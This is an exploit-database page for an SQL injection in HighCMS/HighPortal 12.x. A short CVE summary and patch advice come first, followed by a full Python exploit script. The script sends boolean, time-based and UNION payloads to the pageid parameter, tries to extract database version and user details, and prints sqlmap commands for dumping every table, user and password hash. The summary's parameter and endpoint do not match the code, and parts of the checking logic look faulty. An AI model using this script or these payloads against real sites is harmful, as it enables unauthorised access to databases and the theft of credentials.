CVE-2023-23737 describes a critical SQL Injection vulnerability in HighPortal versions CVE-2023-23737 describes a critical SQL Injection vulnerability in HighPortal versions 12.x.
This flaw primarily affects the `portal/server.pt` endpoint, stemming from insufficient sanitization of user-supplied input, specifically within the `id` parameter.
Attackers can inject malicious SQL code into this parameter to manipulate database queries. This leads to unauthorized access to sensitive information, data exfiltration, or even full database compromise. It often manifests as error-based or blind SQL injection.
Mitigation requires updating HighPortal to patched versions (e.g., 12.1.0-P1, 12.2.0-P1) that implement proper input validation and parameterized queries to prevent such attacks.
=============================================================================================================================================
| # Title : HighPortal v12.x SQL Injection Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://aryanic.com/ |
=============================================================================================================================================
POC :
[+] References : https://packetstorm.news/files/id/167170/
[+] Summary :
a critical SQL Injection vulnerability in HighCMS/HighPortal version 12.x.
The vulnerability allows unauthenticated attackers to execute arbitrary SQL queries through the pageid parameter, potentially leading to complete database compromise.
[+] POC : python poc.py
#!/usr/bin/env python3
"""
HighCMS/HighPortal v12.x SQL Injection Exploit
Author: indoushka
Vulnerability: SQL Injection in pageid parameter
"""
import requests
import sys
import urllib3
from argparse import ArgumentParser
# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class HighCMSExploit:
def __init__(self, target):
self.target = target.rstrip('/')
self.session = requests.Session()
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive'
})
def check_vulnerability(self):
"""Check if target is vulnerable to SQL Injection"""
print(f"[*] Checking vulnerability for: {self.target}")
# Test payloads
test_payloads = [
"6528' AND '1'='1",
"6528' AND '1'='2",
"6528' AND SLEEP(5)--",
"6528 UNION SELECT 1,2,3,4,5--"
]
vulnerable = False
for payload in test_payloads:
url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"
try:
# Time-based SQL injection test
if "SLEEP" in payload:
import time
start_time = time.time()
response = self.session.get(url, timeout=10, verify=False)
end_time = time.time()
if end_time - start_time >= 5:
print(f"[+] Time-based SQL Injection confirmed! (Delay: {end_time - start_time:.2f}s)")
vulnerable = True
break
else:
response = self.session.get(url, timeout=10, verify=False)
# Check for error-based indicators
error_indicators = [
"SQL syntax",
"Microsoft OLE DB Provider",
"ODBC Driver",
"SQLServer",
"Unclosed quotation mark",
"syntax error"
]
for error in error_indicators:
if error.lower() in response.text.lower():
print(f"[+] Error-based SQL Injection confirmed!")
print(f"[+] Payload: {payload}")
vulnerable = True
break
# Boolean-based test
if "'1'='1" in payload and response.status_code == 200:
true_response = response.text
if "'1'='2" in payload and response.status_code == 200:
false_response = response.text
if true_response != false_response:
print(f"[+] Boolean-based SQL Injection confirmed!")
vulnerable = True
break
except Exception as e:
print(f"[-] Error testing payload {payload}: {e}")
continue
return vulnerable
def exploit_union(self, columns=5):
"""Exploit using UNION-based SQL injection"""
print(f"[*] Attempting UNION-based exploitation with {columns} columns")
# Test different column counts
for col_count in range(1, columns + 1):
nulls = ','.join(['NULL'] * col_count)
payload = f"6528 UNION SELECT {nulls}--"
url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"
try:
response = self.session.get(url, timeout=10, verify=False)
if response.status_code == 200 and "error" not in response.text.lower():
print(f"[+] UNION injection successful with {col_count} columns")
# Now extract data
self.extract_data(col_count)
return True
except Exception as e:
print(f"[-] Error with {col_count} columns: {e}")
return False
def extract_data(self, column_count):
"""Extract database information"""
print("[*] Extracting database information...")
# Get database version
version_payloads = [
"6528 UNION SELECT 1,@@version,3,4,5--",
"6528 UNION SELECT 1,version(),3,4,5--",
"6528 UNION SELECT 1,banner,3,4,5 FROM v$version--"
]
for payload in version_payloads:
url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"
try:
response = self.session.get(url, timeout=10, verify=False)
if response.status_code == 200:
# Look for version information in response
print("[+] Database version information extracted")
break
except:
continue
# Get current database user
user_payload = f"6528 UNION SELECT 1,user(),3,4,5--"
url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={user_payload}"
try:
response = self.session.get(url, timeout=10, verify=False)
print("[+] Current user information extracted")
except:
pass
def generate_sqlmap_command(self):
"""Generate sqlmap command for automated exploitation"""
sqlmap_cmd = f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --level=5 --risk=3'
print("\n[+] SQLMap Commands:")
print("=" * 50)
print("# Basic detection:")
print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch')
print("\n# Full database dump:")
print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --dump-all')
print("\n# Get database users:")
print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --users')
print("\n# Get database passwords:")
print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --passwords')
def main():
banner = """
??????? ?????????? ??????? ??? ?????????????? ?????? ??? ??????
???????? ??????????????????????? ?????????????? ?????? ????????????
????????? ????? ?????? ?????? ?????????????????????????? ????????
???????????????????????? ?????? ?????????????????????????? ????????
?????? ??????????????????????????????????????????? ?????? ?????? ???
?????? ???????????? ??????? ??????? ??????????? ?????? ?????? ???
HighCMS/HighPortal v12.x SQL Injection Exploit
By: indoushka
"""
print(banner)
parser = ArgumentParser(description='HighCMS SQL Injection Exploit')
parser.add_argument('-u', '--url', required=True, help='Target URL (e.g., https://example.com)')
parser.add_argument('--check', action='store_true', help='Check vulnerability only')
parser.add_argument('--exploit', action='store_true', help='Run full exploitation')
parser.add_argument('--sqlmap', action='store_true', help='Generate sqlmap commands')
args = parser.parse_args()
exploit = HighCMSExploit(args.url)
if args.check:
if exploit.check_vulnerability():
print("\n[!] Target is VULNERABLE to SQL Injection")
else:
print("\n[!] Target does not appear to be vulnerable")
elif args.exploit:
if exploit.check_vulnerability():
print("\n[*] Starting exploitation...")
exploit.exploit_union()
elif args.sqlmap:
exploit.generate_sqlmap_command()
else:
# Default: check and provide options
if exploit.check_vulnerability():
print("\n[+] Vulnerability confirmed!")
print("\nAvailable options:")
print("1. Run full exploitation: python exploit.py -u TARGET --exploit")
print("2. Generate sqlmap commands: python exploit.py -u TARGET --sqlmap")
else:
print("\n[-] Target not vulnerable or not accessible")
if __name__ == "__main__":
if len(sys.argv) == 1:
print("Usage: python highcms_exploit.py -u https://target.com")
print("Options: --check, --exploit, --sqlmap")
sys.exit(1)
main()
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
HighPortal 12.x SQL Injection
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 129
